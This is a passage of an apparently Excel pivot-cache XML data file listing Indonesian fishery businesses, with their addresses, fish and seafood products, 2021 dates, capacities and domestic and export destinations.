    <s v="Kawasan Pelabuhan Perikanan Samudera Nizam Zachman Jakarta Blok M Kav. No. 9-10, Kel. Penjaringan, Kec. Penjaringan, Kota Jakarta Utara&lt;br&gt;DKI Jakarta"/>
    <n v="12"/>
    <s v="Ikan Demersal Beku (Kakap Putih, Bawal Hitam, Gulama, Lencam, Manyung, Kuwe)"/>
    <d v="2021-06-10T00:00:00"/>
    <n v="10000"/>
    <m/>
    <s v="Japan, Malaysia, Singapore, Thailand, Ukraine, United States, Viet Nam"/>
  </r>
  <r>
    <n v="25692"/>
    <x v="1221"/>
    <s v="PT. INDOMINA BAHARI SEJAHTERA"/>
    <s v="Kawasan Pelabuhan Perikanan Samudera Nizam Zachman Jakarta Blok M Kav. No. 9-10, Kel. Penjaringan, Kec. Penjaringan, Kota Jakarta Utara&lt;br&gt;DKI Jakarta"/>
    <n v="12"/>
    <s v="Cephalopoda Beku (Sotong, Gurita, Cumi-cumi)"/>
    <d v="2021-06-10T00:00:00"/>
    <n v="5000"/>
    <m/>
    <s v="Japan, Malaysia, Singapore, Thailand, Ukraine, United States, Viet Nam"/>
  </r>
  <r>
    <n v="25693"/>
    <x v="1221"/>
    <s v="PT. INDOMINA BAHARI SEJAHTERA"/>
    <s v="Kawasan Pelabuhan Perikanan Samudera Nizam Zachman Jakarta Blok M Kav. No. 9-10, Kel. Penjaringan, Kec. Penjaringan, Kota Jakarta Utara&lt;br&gt;DKI Jakarta"/>
    <n v="12"/>
    <s v="Bandeng Beku"/>
    <d v="2021-06-10T00:00:00"/>
    <n v="3000"/>
    <m/>
    <m/>
  </r>
  <r>
    <n v="25695"/>
    <x v="1222"/>
    <s v="CV. NA RAHMAT"/>
    <s v="Jl. Medan-Banda Aceh, Kel. Gampong Baro, Kec. Idi Rayeuk, Kabupaten Aceh Timur&lt;br&gt;Aceh"/>
    <n v="1"/>
    <s v="Ikan Pelagis Beku (Tongkol, Kembung, Lemadang, Sarden, Layang, Cakalang, Tenggiri)"/>
    <d v="2021-05-27T00:00:00"/>
    <n v="80000"/>
    <s v="Kabupaten Aceh Timur"/>
    <s v="Austria, Belgium, Denmark, Finland, Malaysia, Netherlands, Poland, Sweden, Thailand, United Arab Emirates"/>
  </r>
  <r>
    <n v="25698"/>
    <x v="1223"/>
    <s v="PT, LAUTAN BAHARI SEJAHTERA"/>
    <s v="Jl, Raya Suli Atas, Kel, Suli, Kec, Salahutu, Kabupaten Maluku Tengah&lt;br&gt;Maluku"/>
    <n v="31"/>
    <s v="Tuna Loin Beku"/>
    <d v="2021-06-15T00:00:00"/>
    <n v="180000"/>
    <s v="Kota Jakarta Utara"/>
    <m/>
  </r>
  <r>
    <n v="25699"/>
    <x v="1223"/>
    <s v="PT. LAUTAN BAHARI SEJAHTERA"/>
    <s v="Jl. Raya Suli Atas, Kel. Suli, Kec. Salahutu, Kabupaten Maluku Tengah&lt;br&gt;Maluku"/>
    <n v="31"/>
    <s v="Ikan Pelagis Beku (Teri, Baby Tuna, Tongkol, Kembung, Marlin, Selar, Layang, Cakalang, Tenggiri)"/>
    <d v="2021-06-15T00:00:00"/>
    <n v="0"/>
    <s v="Kota Jakarta Utara"/>
    <m/>
  </r>
  <r>
    <n v="25712"/>
    <x v="1224"/>
    <s v="UD. PAPUA JAYA BAHARI"/>
    <s v="Jl. Perikanan RT 002 RW 004, Kel. Klaligi, Kec. Sorong Manoi, Kota Sorong&lt;br&gt;Papua Barat"/>
    <n v="33"/>
    <s v="Lobster Hidup"/>
    <d v="2021-06-11T00:00:00"/>
    <n v="7200"/>
    <s v="Kota Jakarta Pusat"/>
    <m/>
  </r>
  <r>
    <n v="25713"/>
    <x v="1225"/>
    <s v="PT. INDO JAYA FORTUNA"/>
    <s v="Jl. Tanjung Merah, Kel. Manembo Nembo Bawah, Kec. Matuari, Kota Bitung&lt;br&gt;Sulawesi Utara"/>
    <n v="29"/>
    <s v="Ikan Demersal Segar (Kuwe, Kerapu, Kakatua, Kakap)"/>
    <d v="2021-06-17T00:00:00"/>
    <n v="1000"/>
    <s v="Kota Jakarta Utara"/>
    <s v="China, Japan, Taiwan, Province of China, Thailand, United Kingdom, United States"/>
  </r>
  <r>
    <n v="25714"/>
    <x v="314"/>
    <s v="PT. NAILI OCEAN"/>
    <s v="Jl. Muara Baru Ujung Blok M No.1-2 (Room 1), Kel. Penjaringan, Kec. Penjaringan, Kota Jakarta Utara&lt;br&gt;DKI Jakarta"/>
    <n v="12"/>
    <s v="Ikan Pelagis Segar (Amberjack, Pacific Saury, Alfosino, Barakuda, Makerel, Ekor Kuning)"/>
    <d v="2021-06-10T00:00:00"/>
    <n v="50000"/>
    <s v="Kota Jakarta Utara"/>
    <s v="China, Japan, Taiwan, Province of China"/>
  </r>
  <r>
    <n v="25715"/>
    <x v="314"/>
    <s v="PT. NAILI OCEAN"/>
    <s v="Jl. Muara Baru Ujung Blok M No.1-2 (Room 1), Kel. Penjaringan, Kec. Penjaringan, Kota Jakarta Utara&lt;br&gt;DKI Jakarta"/>
    <n v="12"/>
    <s v="Bulu Babi Segar"/>
    <d v="2021-06-10T00:00:00"/>
    <n v="50000"/>
    <s v="Kota Jakarta Utara"/>
    <s v="China, Japan, Taiwan, Province of China"/>
  </r>
  <r>
    <n v="25716"/>
    <x v="314"/>
    <s v="PT. NAILI OCEAN"/>
    <s v="Jl. Muara Baru Ujung Blok M No.1-2 (Room 1), Kel. Penjaringan, Kec. Penjaringan, Kota Jakarta Utara&lt;br&gt;DKI Jakarta"/>
    <n v="12"/>
    <s v="Cephalopoda Segar (Cumi-cumi)"/>
    <d v="2021-06-10T00:00:00"/>
    <n v="25000"/>
    <s v="Kota Jakarta Utara"/>
    <s v="China, Japan"/>
  </r>
  <r>
    <n v="25717"/>
    <x v="314"/>
    <s v="PT. NAILI OCEAN"/>
    <s v="Jl. Muara Baru Ujung Blok M No.1-2 (Room 1), Kel. Penjaringan, Kec. Penjaringan, Kota Jakarta Utara&lt;br&gt;DKI Jakarta"/>
    <n v="12"/>
    <s v="Ikan Demersal Segar (Layur, Red Tilefish, Red Sea Bream, Lepu, Seabass, Gerot, Kuwe)"/>
    <d v="2021-06-10T00:00:00"/>
    <n v="25000"/>
    <s v="Kota Jakarta Utara"/>
    <s v="China, Japan"/>
  </r>
  <r>
    <n v="25719"/>
    <x v="314"/>
    <s v="PT. NAILI OCEAN"/>
    <s v="Jl. Muara Baru Ujung Blok M No.1-2 (Room 1), Kel. Penjaringan, Kec. Penjaringan, Kota Jakarta Utara&lt;br&gt;DKI Jakarta"/>
    <n v="12"/>
    <s v="Kepiting Segar"/>
    <d v="2021-06-10T00:00:00"/>
    <n v="25000"/>
    <s v="Kota Jakarta Utara"/>
    <s v="China, Japan"/>
  </r>
  <r>
    <n v="25720"/>
    <x v="314"/>
    <s v="PT. NAILI OCEAN"/>
    <s v="Jl. Muara Baru Ujung Blok M No.1-2 (Room 1), Kel. Penjaringan, Kec. Penjaringan, Kota Jakarta Utara&lt;br&gt;DKI Jakarta"/>
    <n v="12"/>
    <s v="Udang Segar"/>
    <d v="2021-06-10T00:00:00"/>
    <n v="25000"/>
    <s v="Kota Jakarta Utara"/>
    <s v="China, Japan"/>
  </r>
  <r>
    <n v="25721"/>
    <x v="314"/>
    <s v="PT. NAILI OCEAN"/>
    <s v="Jl. Muara Baru Ujung Blok M No.1-2 (Room 1), Kel. Penjaringan, Kec. Penjaringan, Kota Jakarta Utara&lt;br&gt;DKI Jakarta"/>
    <n v="12"/>
    <s v="Salmon Segar, Trout Segar"/>
    <d v="2021-06-10T00:00:00"/>
    <n v="25000"/>
    <s v="Kota Jakarta Utara"/>
    <s v="China, Japan"/>
  </r>
  <r>
    <n v="25722"/>
    <x v="1226"/>
    <s v="UD. MUL MANDAY 88"/>
    <s v="Jl. Pasar Ikan Blok L No.23 Pasar Baru Koto 2, Kel. Malabero, Kec. Teluk Segara, Kota Bengkulu&lt;br&gt;Bengkulu"/>
    <n v="8"/>
    <s v="Surimi Beku"/>
    <d v="2021-05-21T00:00:00"/>
    <n v="60000"/>
    <s v="Kota Padang, Kota Bengkulu"/>
    <m/>
  </r>
  <r>
    <n v="25723"/>
    <x v="1225"/>
    <s v="PT. INDO JAYA FORTUNA"/>
    <s v="Jl. Tanjung Merah, Kel. Manembo Nembo Bawah, Kec. Matuari, Kota Bitung&lt;br&gt;Sulawesi Utara"/>
    <n v="29"/>
    <s v="Tuna Beku"/>
    <d v="2021-06-17T00:00:00"/>
    <n v="50000"/>
    <s v="Kota Jakarta Utara"/>
    <s v="China, Japan, Taiwan, Province of China, Thailand, United Kingdom, United States, Viet Nam"/>
  </r>
  <r>
    <n v="25724"/>
    <x v="1225"/>
    <s v="PT. INDO JAYA FORTUNA"/>
    <s v="Jl. Tanjung Merah, Kel. Manembo Nembo Bawah, Kec. Matuari, Kota Bitung&lt;br&gt;Sulawesi Utara"/>
    <n v="29"/>
    <s v="Tuna Segar"/>
    <d v="2021-06-17T00:00:00"/>
    <n v="20000"/>
    <s v="Kota Jakarta Pusat"/>
    <s v="Belgium, Japan, Thailand, United Kingdom, United States, Viet Nam"/>
  </r>
  <r>
    <n v="25725"/>
    <x v="1225"/>
    <s v="PT. INDO JAYA FORTUNA"/>
    <s v="Jl. Tanjung Merah, Kel. Manembo Nembo Bawah, Kec. Matuari, Kota Bitung&lt;br&gt;Sulawesi Utara"/>
    <n v="29"/>
    <s v="Ikan Pelagis Beku (Tongkol, Malalugis, Pedang)"/>
    <d v="2021-06-17T00:00:00"/>
    <n v="5000"/>
    <s v="Kota Jakarta Utara"/>
    <s v="Japan, United States"/>
  </r>
  <r>
    <n v="25726"/>
    <x v="1225"/>
    <s v="PT. INDO JAYA FORTUNA"/>
    <s v="Jl. Tanjung Merah, Kel. Manembo Nembo Bawah, Kec. Matuari, Kota Bitung&lt;br&gt;Sulawesi Utara"/>
    <n v="29"/>
    <s v="Ikan Demersal Beku (Kuwe, Kerapu, Kakatua, Kakap)"/>
    <d v="2021-06-17T00:00:00"/>
    <n v="1000"/>
    <s v="Kota Jakarta Utara"/>
    <s v="China, Singapore, United Kingdom, United States"/>
  </r>
  <r>
    <n v="25734"/>
    <x v="570"/>
    <s v="CV. AZRA SENTOSA JAYA"/>
    <s v="Jl. Strat 2 RT 17 No.30 , Kel. Gunung Samarinda, Kec. Balikpapan Utara, Kota Balikpapan&lt;br&gt;Kalimantan Timur"/>
    <n v="23"/>
    <s v="Peyek Kepiting"/>
    <d v="2021-06-09T00:00:00"/>
    <n v="2400"/>
    <s v="Kota Balikpapan"/>
    <s v="China"/>
  </r>
  <r>
    <n v="25736"/>
    <x v="1227"/>
    <s v="PT. PERIKANAN NUSANTARA (PERSERO) CABANG GORONTALO"/>
    <s v="Jl. Botuliodu, Kel. Tenda, Kec. Hulonthalangi, Kota Gorontalo&lt;br&gt;Gorontalo"/>
    <n v="25"/>
    <s v="Bandeng Beku"/>
    <d v="2021-07-05T00:00:00"/>
    <n v="400000"/>
    <s v="Kota Jakarta Pusat"/>
    <s v="Japan"/>
  </r>
  <r>
    <n v="25737"/>
    <x v="1227"/>
    <s v="PT. PERIKANAN NUSANTARA (PERSERO) CABANG GORONTALO"/>
    <s v="Jl. Botuliodu, Kel. Tenda, Kec. Hulonthalangi, Kota Gorontalo&lt;br&gt;Gorontalo"/>
    <n v="25"/>
    <s v="Ikan Pelagis Beku (Panni, Tongkol, Layang, Cakalang)"/>
    <d v="2021-07-05T00:00:00"/>
    <n v="20000"/>
    <s v="Kota Jakarta Pusat, Kota Jakarta Utara"/>
    <s v="Japan"/>
  </r>
  <r>
    <n v="25738"/>
    <x v="1227"/>
    <s v="PT. PERIKANAN NUSANTARA (PERSERO) CABANG GORONTALO"/>
    <s v="Jl. Botuliodu, Kel. Tenda, Kec. Hulonthalangi, Kota Gorontalo&lt;br&gt;Gorontalo"/>
    <n v="25"/>
    <s v="Tuna Beku"/>
    <d v="2021-07-05T00:00:00"/>
    <n v="1000"/>
    <s v="Kota Jakarta Pusat"/>
    <s v="Japan, Singapore, United States"/>
  </r>
  <r>
    <n v="25739"/>
    <x v="1227"/>
    <s v="PT. PERIKANAN NUSANTARA (PERSERO) CABANG GORONTALO"/>
    <s v="Jl. Botuliodu, Kel. Tenda, Kec. Hulonthalangi, Kota Gorontalo&lt;br&gt;Gorontalo"/>
    <n v="25"/>
    <s v="Tuna Segar"/>
    <d v="2021-07-05T00:00:00"/>
    <n v="1000"/>
    <s v="Kabupaten Maluku Barat Daya"/>
    <s v="Japan, Singapore, United States"/>
  </r>
  <r>
    <n v="25741"/>
    <x v="1228"/>
    <s v="MOM AKG"/>
    <s v="Jl. Sersan Anwar Bay RT 01, Kel. Bagan Pete, Kec. Alam Barajo, Kota Jambi&lt;br&gt;Jambi"/>
    <n v="7"/>
    <s v="Patin Asap"/>
    <d v="2021-05-31T00:00:00"/>
    <n v="5000"/>
    <s v="Kota Palembang"/>
    <m/>
  </r>
  <r>
    <n v="25742"/>
    <x v="478"/>
    <s v="PT. CAKRAWALA MITRA BAHARI"/>
    <s v="Jl. Wolter Monginsidi No. 28, Kel. Nalu, Kec. Baolan, Kabupaten Toli-Toli&lt;br&gt;Sulawesi Tengah"/>
    <n v="28"/>
    <s v="Bandeng Beku"/>
    <d v="2021-06-21T00:00:00"/>
    <n v="20000"/>
    <s v="Kota Jakarta Utara"/>
    <m/>
  </r>
  <r>
    <n v="25746"/>
    <x v="1229"/>
    <s v="OMMEY BASRENG"/>
    <s v="Jl. Wr. Supratman RT 07 No.31, Kel. Kandang Limun, Kec. Muara Bangka Hulu, Kota Bengkulu&lt;br&gt;Bengkulu"/>
    <n v="8"/>
    <s v="Kerupuk Kulit Ikan"/>
    <d v="2021-05-21T00:00:00"/>
    <n v="2400"/>
    <s v="Kota Bengkulu"/>
    <m/>
  </r>
  <r>
    <n v="25747"/>
    <x v="570"/>
    <s v="CV. AZRA SENTOSA JAYA"/>
    <s v="Jl. Strat 2 RT 17 No.30, Kel. Gunung Samarinda, Kec. Balikpapan Utara, Kota Balikpapan&lt;br&gt;Kalimantan Timur"/>
    <n v="23"/>
    <s v="Abon Tuna"/>
    <d v="2021-06-09T00:00:00"/>
    <n v="200"/>
    <s v="Kota Balikpapan"/>
    <m/>
  </r>
  <r>
    <n v="25748"/>
    <x v="1230"/>
    <s v="CV. LANDAK LAUT SEAFOOD"/>
    <s v="Jl. Bakaran Batu 16AA, Kel. Sei Rengas Permata, Kec. Medan Area, Kota Medan&lt;br&gt;Sumatera Utara"/>
    <n v="2"/>
    <s v="Sirip Hiu Kering, Kulit Hiu Kering"/>
    <d v="2021-06-11T00:00:00"/>
    <n v="10000"/>
    <m/>
    <s v="China, Hong Kong, Viet Nam"/>
  </r>
  <r>
    <n v="25749"/>
    <x v="1230"/>
    <s v="CV, LANDAK LAUT SEAFOOD"/>
    <s v="Jl, Bakaran Batu 16AA, Kel, Sei Rengas Permata, Kec, Medan Area, Kota Medan&lt;br&gt;Sumatera Utara"/>
    <n v="2"/>
    <s v="Sirip Pari Kering, Kulit Pari Kering"/>
    <d v="2021-06-11T00:00:00"/>
    <n v="100000"/>
    <m/>
    <s v="China, Hong Kong, Thailand, Viet Nam"/>
  </r>
  <r>
    <n v="25750"/>
    <x v="1230"/>
    <s v="CV, LANDAK LAUT SEAFOOD"/>
    <s v="Jl, Bakaran Batu 16AA, Kel, Sei Rengas Permata, Kec, Medan Area, Kota Medan&lt;br&gt;Sumatera Utara"/>
    <n v="2"/>
    <s v="Perut Ikan Kering"/>
    <d v="2021-06-11T00:00:00"/>
    <n v="100000"/>
    <m/>
    <s v="China, Hong Kong, Thailand, Viet Nam"/>
  </r>
  <r>
    <n v="25751"/>
    <x v="1132"/>
    <s v="PT, INTIMAS SURYA"/>
    <s v="Jl, Muara Baru Ujung Blok E No,1, Kel, Penjaringan, Kec, Penjaringan, Kota Jakarta Utara&lt;br&gt;DKI Jakarta"/>
    <n v="12"/>
    <s v="Cephalopoda Beku (Sotong, Gurita, Cumi-cumi)"/>
    <d v="2021-05-21T00:00:00"/>
    <n v="10000"/>
    <s v="Kota Jakarta Utara, Kota Denpasar"/>
    <s v="Japan, Malaysia, United States"/>
  </r>
  <r>
    <n v="25752"/>
    <x v="1231"/>
    <s v="CV. BINTANG MAS SPORTINDO"/>
    <s v="Jl. Homebes RT 01 RW 02, Kel. Batu Walenrang, Kec. Telluwanua, Kota Palopo&lt;br&gt;Sulawesi Selatan"/>
    <n v="26"/>
    <s v="Rumput Laut Kering"/>
    <d v="2021-06-25T00:00:00"/>
    <n v="3600000"/>
    <m/>
    <s v="China, Taiwan, Province of China, Viet Nam"/>
  </r>
  <r>
    <n v="25753"/>
    <x v="84"/>
    <s v="PT. MUTIARA LAUT ABADI"/>
    <s v="Jl. Pulau Buton KIM II Mabar, Kel. Saentis, Kec. Percut Sei Tuan, Kabupaten Deli Serdang&lt;br&gt;Sumatera Utara"/>
    <n v="2"/>
    <s v="Cephalopoda Beku (Gurita)"/>
    <d v="2021-06-11T00:00:00"/>
    <n v="30000"/>
    <m/>
    <s v="Australia, China, Hong Kong, Korea, Democratic People's Republic of, United States"/>
  </r>
  <r>
    <n v="25773"/>
    <x v="1232"/>
    <s v="PT. AGUNG MULIA CHEMINDO"/>
    <s v="Prima Centre 1 Blok I No.3 RT 009 RW 002, Kel. Kedaung Kaliangke, Kec. Cengkareng, Kota Jakarta Barat&lt;br&gt;DKI Jakarta"/>
    <n v="12"/>
    <s v="Tepung Ikan, Tepung Salmon, Tepung Udang, Tepung Teri, Tepung Kod, Tepung Cumi-cumi"/>
    <d v="2021-06-22T00:00:00"/>
    <n v="0"/>
    <s v="Kota Jakarta Selatan, Kota Jakarta Timur, Kota Jakarta Pusat, Kota Jakarta Barat, Kota Jakarta Utara, Kabupaten Bogor, Kabupaten Bekasi, Kota Bogor, Kota Bekasi, Kota Depok, Kabupaten Tangerang, Kota Tangerang, Kota Tangerang Selatan"/>
    <m/>
  </r>
  <r>
    <n v="25774"/>
    <x v="166"/>
    <s v="PT. TRIDAYA ERAMINA BAHARI"/>
    <s v="Jl. Muara Baru Ujung Blok K No.3, Kel. Penjaringan, Kec. Penjaringan, Kota Jakarta Utara&lt;br&gt;DKI Jakarta"/>
    <n v="12"/>
    <s v="Kepiting Lunak Beku"/>
    <d v="2021-06-04T00:00:00"/>
    <n v="2000"/>
    <m/>
    <s v="Italy, Japan, Viet Nam"/>
  </r>
  <r>
    <n v="25795"/>
    <x v="1233"/>
    <s v="AMPIANG YU'ERIN"/>
    <s v="Jl. Raya Belinyu RT 03, Kel. Sinar Jaya Jelutung, Kec. Sungailiat, Kabupaten Bangka&lt;br&gt;Kepulauan Bangka Belitung"/>
    <n v="6"/>
    <s v="Getas Ikan, Getas Cumi-cumi"/>
    <d v="2021-06-23T00:00:00"/>
    <n v="2400"/>
    <s v="Kabupaten Bangka, Kabupaten Bangka Barat, Kabupaten Bangka Tengah, Kabupaten Bangka Selatan, Kota Pangkal Pinang"/>
    <m/>
  </r>
  <r>
    <n v="25796"/>
    <x v="1233"/>
    <s v="AMPIANG YU'ERIN"/>
    <s v="Jl. Raya Belinyu RT 03, Kel. Sinar Jaya Jelutung, Kec. Sungailiat, Kabupaten Bangka&lt;br&gt;Kepulauan Bangka Belitung"/>
    <n v="6"/>
    <s v="Stik Ikan, Stik Udang"/>
    <d v="2021-06-23T00:00:00"/>
    <n v="2400"/>
    <s v="Kota Palembang, Kabupaten Bangka, Kabupaten Bangka Barat, Kabupaten Bangka Tengah, Kabupaten Bangka Selatan, Kota Pangkal Pinang"/>
    <m/>
  </r>
  <r>
    <n v="25797"/>
    <x v="1233"/>
    <s v="AMPIANG YU'ERIN"/>
    <s v="Jl. Raya Belinyu RT 03, Kel. Sinar Jaya Jelutung, Kec. Sungailiat, Kabupaten Bangka&lt;br&gt;Kepulauan Bangka Belitung"/>
    <n v="6"/>
    <s v="Kerupuk Ikan, Kerupuk Udang, Kerupuk Cumi-cumi"/>
    <d v="2021-06-23T00:00:00"/>
    <n v="2400"/>
    <s v="Kota Palembang, Kabupaten Bangka, Kabupaten Bangka Barat, Kabupaten Bangka Tengah, Kabupaten Bangka Selatan, Kota Pangkal Pinang"/>
    <m/>
  </r>
  <r>
    <n v="25800"/>
    <x v="1234"/>
    <s v="USAHA PAK UMAR"/>
    <s v="Jl. HOS Cokroaminoto No.77, Kel. Sungailiat, Kec. Sungailiat, Kabupaten Bangka&lt;br&gt;Kepulauan Bangka Belitung"/>
    <n v="6"/>
    <s v="Abon Ikan"/>
    <d v="2021-06-23T00:00:00"/>
    <n v="120"/>
    <s v="Kabupaten Bangka, Kota Pangkal Pinang"/>
    <m/>
  </r>
  <r>
    <n v="25801"/>
    <x v="1234"/>
    <s v="USAHA PAK UMAR"/>
    <s v="Jl. HOS Cokroaminoto No.77, Kel. Sungailiat, Kec. Sungailiat, Kabupaten Bangka&lt;br&gt;Kepulauan Bangka Belitung"/>
    <n v="6"/>
    <s v="Amplang Ikan"/>
    <d v="2021-06-23T00:00:00"/>
    <n v="120"/>
    <s v="Kabupaten Bangka, Kota Pangkal Pinang"/>
    <m/>
  </r>
  <r>
    <n v="25802"/>
    <x v="1234"/>
    <s v="USAHA PAK UMAR"/>
    <s v="Jl. HOS Cokroaminoto No.77, Kel. Sungailiat, Kec. Sungailiat, Kabupaten Bangka&lt;br&gt;Kepulauan Bangka Belitung"/>
    <n v="6"/>
    <s v="Getas Ikan"/>
    <d v="2021-06-23T00:00:00"/>
    <n v="120"/>
    <s v="Kabupaten Bangka, Kota Pangkal Pinang"/>
    <m/>
  </r>
  <r>
    <n v="25803"/>
    <x v="1234"/>
    <s v="USAHA PAK UMAR"/>
    <s v="Jl. HOS Cokroaminoto No.77, Kel. Sungailiat, Kec. Sungailiat, Kabupaten Bangka&lt;br&gt;Kepulauan Bangka Belitung"/>
    <n v="6"/>
    <s v="Kerupuk Telur Cumi-Cumi"/>
    <d v="2021-06-23T00:00:00"/>
    <n v="120"/>
    <s v="Kabupaten Bangka, Kota Pangkal Pinang"/>
    <m/>
  </r>
  <r>
    <n v="25804"/>
    <x v="1234"/>
    <s v="USAHA PAK UMAR"/>
    <s v="Jl. HOS Cokroaminoto No.77, Kel. Sungailiat, Kec. Sungailiat, Kabupaten Bangka&lt;br&gt;Kepulauan Bangka Belitung"/>
    <n v="6"/>
    <s v="Stik Ikan"/>
    <d v="2021-06-23T00:00:00"/>
    <n v="120"/>
    <s v="Kabupaten Bangka, Kota Pangkal Pinang"/>
    <m/>
  </r>
  <r>
    <n v="25806"/>
    <x v="1140"/>
    <s v="PT. JALUR SUTERA MAS"/>
    <s v="Pergudangan Kosambi Permai Blok D No.1, Jl. Raya Perancis, Kel. Jatimulya, Kec. Kosambi, Kabupaten Tangerang&lt;br&gt;Banten"/>
    <n v="11"/>
    <s v="Teripang Kering"/>
    <d v="2021-06-07T00:00:00"/>
    <n v="10000"/>
    <m/>
    <s v="China, Hong Kong, Singapore, Taiwan, Province of China, Viet Nam"/>
  </r>
  <r>
    <n v="25807"/>
    <x v="1140"/>
    <s v="PT. JALUR SUTERA MAS"/>
    <s v="Pergudangan Kosambi Permai Blok D No.1, Jl. Raya Perancis, Kel. Jatimulya, Kec. Kosambi, Kabupaten Tangerang&lt;br&gt;Banten"/>
    <n v="11"/>
    <s v="Perut Ikan Kering"/>
    <d v="2021-06-07T00:00:00"/>
    <n v="10000"/>
    <m/>
    <s v="China, Hong Kong, Malaysia, Singapore, Taiwan, Province of China, Thailand, Viet Nam"/>
  </r>
  <r>
    <n v="25808"/>
    <x v="1140"/>
    <s v="PT. JALUR SUTERA MAS"/>
    <s v="Pergudangan Kosambi Permai Blok D No.1, Jl. Raya Perancis, Kel. Jatimulya, Kec. Kosambi, Kabupaten Tangerang&lt;br&gt;Banten"/>
    <n v="11"/>
    <s v="Ikan Asin Kering"/>
    <d v="2021-06-07T00:00:00"/>
    <n v="10000"/>
    <m/>
    <s v="China, Hong Kong, Malaysia, Singapore, Taiwan, Province of China, Thailand"/>
  </r>
  <r>
    <n v="25809"/>
    <x v="1235"/>
    <s v="CV. BARIS ANUGERAH"/>
    <s v="Dusun III, Kel. Dulomo, Kec. Tilango, Kabupaten Gorontalo&lt;br&gt;Gorontalo"/>
    <n v="25"/>
    <s v="Tuna Segar"/>
    <d v="2021-05-31T00:00:00"/>
    <n v="10000"/>
    <m/>
    <s v="Japan, Malaysia, Singapore"/>
  </r>
  <r>
    <n v="25810"/>
    <x v="62"/>
    <s v="PT. TIMUR JAYA CEMERLANG"/>
    <s v="Jl. Kapten Samadikun No. 34 RT 01 RW 05, Kel. Kesenden, Kec. Kejaksan, Kota Cirebon&lt;br&gt;Jawa Barat"/>
    <n v="13"/>
    <s v="Udang Beku"/>
    <d v="2021-07-01T00:00:00"/>
    <n v="200000"/>
    <m/>
    <s v="China, Malaysia, Singapore, Taiwan, Province of China, Viet Nam"/>
  </r>
  <r>
    <n v="25811"/>
    <x v="62"/>
    <s v="PT. TIMUR JAYA CEMERLANG"/>
    <s v="Jl. Kapten Samadikun No. 34 RT 01 RW 05, Kel. Kesenden, Kec. Kejaksan, Kota Cirebon&lt;br&gt;Jawa Barat"/>
    <n v="13"/>
    <s v="Ikan Demersal Beku (Bawal Hitam, Gulama, Kerapu, Layur, Bawal, Kakap Merah)"/>
    <d v="2021-07-01T00:00:00"/>
    <n v="66000"/>
    <m/>
    <s v="China, Malaysia, Singapore, Taiwan, Province of China, Viet Nam"/>
  </r>
  <r>
    <n v="25812"/>
    <x v="62"/>
    <s v="PT. TIMUR JAYA CEMERLANG"/>
    <s v="Jl. Kapten Samadikun No. 34 RT 01 RW 05, Kel. Kesenden, Kec. Kejaksan, Kota Cirebon&lt;br&gt;Jawa Barat"/>
    <n v="13"/>
    <s v="Ikan Pelagis Beku (Tenggiri)"/>
    <d v="2021-07-01T00:00:00"/>
    <n v="0"/>
    <m/>
    <s v="China, Malaysia, Singapore, Taiwan, Province of China, Viet Nam"/>
  </r>
  <r>
    <n v="25813"/>
    <x v="1236"/>
    <s v="PT. NATUNA FISH BUILDING"/>
    <s v="Pergudangan Kartika Blok B No. 2 Batu Ampar Batam, Kel. Taman Baloi, Kec. Batam Kota, Kota Batam&lt;br&gt;Kepulauan Riau"/>
    <n v="5"/>
    <s v="Cephalopoda Beku (Cumi-cumi)"/>
    <d v="2021-07-01T00:00:00"/>
    <n v="50000"/>
    <s v="Kota Tanjung Balai, Kota Jambi, Kota Jakarta Pusat"/>
    <s v="China, Malaysia, Singapore, Thailand, Viet Nam"/>
  </r>
  <r>
    <n v="25814"/>
    <x v="1236"/>
    <s v="PT. NATUNA FISH BUILDING"/>
    <s v="Pergudangan Kartika Blok B No. 2 Batu Ampar Batam, Kel. Taman Baloi, Kec. Batam Kota, Kota Batam&lt;br&gt;Kepulauan Riau"/>
    <n v="5"/>
    <s v="Ikan Demersal Beku (Kakap Putih, Malong)"/>
    <d v="2021-07-01T00:00:00"/>
    <n v="1500"/>
    <s v="Kota Jambi, Kota Batam, Kota Jakarta Pusat"/>
    <s v="China, Malaysia, Singapore, Thailand, Viet Nam"/>
  </r>
  <r>
    <n v="25815"/>
    <x v="1236"/>
    <s v="PT. NATUNA FISH BUILDING"/>
    <s v="Pergudangan Kartika Blok B No. 2 Batu Ampar Batam, Kel. Taman Baloi, Kec. Batam Kota, Kota Batam&lt;br&gt;Kepulauan Riau"/>
    <n v="5"/>
    <s v="Ikan Pelagis Beku (Tongkol, Jahan, Selar, Benggol, Tenggiri)"/>
    <d v="2021-07-01T00:00:00"/>
    <n v="197155"/>
    <s v="Kota Tanjung Balai, Kota Jambi, Kota Batam, Kota Jakarta Pusat"/>
    <s v="China, Malaysia, Singapore, Thailand, Viet Nam"/>
  </r>
  <r>
    <n v="25816"/>
    <x v="1236"/>
    <s v="PT. NATUNA FISH BUILDING"/>
    <s v="Pergudangan Kartika Blok B No. 2 Batu Ampar Batam, Kel. Taman Baloi, Kec. Batam Kota, Kota Batam&lt;br&gt;Kepulauan Riau"/>
    <n v="5"/>
    <s v="Udang Segar"/>
    <d v="2021-07-01T00:00:00"/>
    <n v="10000"/>
    <s v="Kota Pekanbaru, Kota Jambi, Kota Batam, Kota Jakarta Pusat"/>
    <s v="China, Malaysia, Singapore, Thailand, Viet Nam"/>
  </r>
  <r>
    <n v="25837"/>
    <x v="780"/>
    <s v="PT. ANEKA TUNA INDONESIA"/>
    <s v="Jl. Raya Surabaya Malang Km 38, Kel. Karangrejo, Kec. Gempol, Kabupaten Pasuruan&lt;br&gt;Jawa Timur"/>
    <n v="16"/>
    <s v="Salmon Kaleng"/>
    <d v="2021-07-02T00:00:00"/>
    <n v="110000"/>
    <m/>
    <s v="Saudi Arabia"/>
  </r>
  <r>
    <n v="25838"/>
    <x v="780"/>
    <s v="PT. ANEKA TUNA INDONESIA"/>
    <s v="Jl. Raya Surabaya Malang Km 38, Kel. Karangrejo, Kec. Gempol, Kabupaten Pasuruan&lt;br&gt;Jawa Timur"/>
    <n v="16"/>
    <s v="Salmon Pouch"/>
    <d v="2021-07-02T00:00:00"/>
    <n v="110000"/>
    <m/>
    <s v="United Kingdom"/>
  </r>
  <r>
    <n v="25851"/>
    <x v="1237"/>
    <s v="PT. ANDIRA INTERNUSA GEMILANG"/>
    <s v="Jl. Jawa Blok G-1, Kel. Ganda Mekar, Kec. Cikarang Barat, Kabupaten Bekasi&lt;br&gt;Jawa Barat"/>
    <n v="13"/>
    <s v="Cephalopoda Beku (Cumi-cumi)"/>
    <d v="2021-06-24T00:00:00"/>
    <n v="100000"/>
